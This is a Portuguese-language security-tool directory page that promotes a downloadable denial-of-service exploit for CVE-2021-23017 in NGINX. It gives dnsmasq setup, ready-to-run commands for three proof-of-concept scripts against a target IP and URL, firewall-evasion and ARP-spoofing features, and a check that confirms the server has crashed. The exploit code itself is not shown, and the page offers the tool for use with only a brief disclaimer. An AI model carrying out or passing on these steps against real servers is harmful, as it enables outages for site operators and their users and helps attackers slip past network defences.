Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/6lj/evil-cve-2021-23017-update-2025
Análise de VulnerabilidadesExploraçãoSegurança WebTestes de PenetraçãoAnálise de DNS
GitHub6lj/evil-cve-2021-23017-update-2025

EVIL-CVE-2021-23017-Update-2025

vulnerabilidade em servidores NGINX (versões 0.6.18–1.20.0). Os scripts visam causar uma Negação de Serviço (DoS) ao enviar respostas DNS maliciosas, com aprimoramentos para contornar firewalls.

Ver Repositório
11há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

vulnerabilidade em servidores NGINX (versões 0.6.18–1.20.0). Os scripts visam causar uma Negação de Serviço (DoS) enviando respostas DNS maliciosas, com melhorias para contornar firewalls. Esta é uma versão melhorada do PoC original de M507/CVE-2021-23017-PoC.

Aviso: Use apenas com permissão explícita por escrito do proprietário do sistema. Testes não autorizados são ilegais.

Requisitos

  • Ambiente: Linux (ex.: Kali Linux, via Termux/configuração virtualizada).
  • Dependências:
    root@kitploit:~
    sudo apt-get update
    sudo apt-get install python3-scapy dnsmasq
    pip3 install scapy requests
    
  • Rede: Mesma sub-rede que o alvo para ARP spoofing, ou o NGINX alvo deve usar seu IP de servidor DNS.

Instalação

  1. Clone o repositório:
    root@kitploit:~
    git clone https://github.com/6lj/EVIL-CVE-2021-23017-Update-2025.git
    cd EVIL-CVE-2021-23017-Update-2025
    
  2. Configure o dnsmasq:
    root@kitploit:~
    sudo nano /etc/dnsmasq.conf
    
    Adicione:
    root@kitploit:~
    address=/test.example.com/192.168.1.100
    
    Inicie:
    root@kitploit:~
    sudo systemctl start dnsmasq
    

O Que Ele Faz

  • Envia respostas DNS maliciosas com um nome de domínio longo (AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.test.com) para derrubar o servidor NGINX.
  • Dispara consultas DNS usando curl e dig para explorar a vulnerabilidade.
  • Contorna firewalls enviando pacotes DNS diretamente e usando processos paralelos.

Diferenças do Original

Comparado a M507/CVE-2021-23017-PoC:

  • Contorno Aprimorado de Firewall: Usa processos paralelos em poc1.2.3.py para sniffing, envio de DNS e disparo de consultas simultâneos; você deve executar os três juntos.
  • Entrega Otimizada de Pacotes: Maior frequência de pacotes e consultas para evitar filtros de firewall.
  • Verificação de Sub-rede: Verifica a compatibilidade da rede para ARP spoofing, melhorando a confiabilidade.

Uso

Execute os três juntos e execute com os argumentos apropriados (substitua <target_ip>, <your_dns_server_ip>, <target_url>).

poc.py

root@kitploit:~
python3 poc.py --dns_server <your_dns_server_ip> --iface eth0 --count 50 --target_url http://<target_url>
  • Faz sniffing e responde a consultas DNS.

poc2.py

root@kitploit:~
python3 poc2.py --target <target_ip> --dns_server <your_dns_server_ip> --iface eth0 --count 50 --target_url http://<target_url>
  • Adiciona envio direto de DNS e disparo de consultas.

poc3.py (Recomendado)

root@kitploit:~
python3 poc3.py --target <target_ip> --dns_server <your_dns_server_ip> --iface eth0 --target_url http://<target_url>
  • Executa tarefas em paralelo para máxima eficiência.

Exemplo

root@kitploit:~
python3 poc3.py --target 192.168.1.100 --dns_server 192.168.1.101 --iface eth0 --target_url http://192.168.1.100

Verificar Resultados

  • Verifique o estado do servidor:

    root@kitploit:~
    curl -I http://<target_url>
    
    • Sucesso: 502 Bad Gateway ou 503 Service Unavailable indica uma queda do servidor.
    • Falha: 200 OK sugere que não há vulnerabilidade ou bloqueio de firewall.
  • Monitore o tráfego DNS:

    root@kitploit:~
    sudo wireshark -f "udp port 53"
    

Aviso Legal: Apenas para fins educacionais. Os autores não são responsáveis pelo uso indevido.

Baixar ferramenta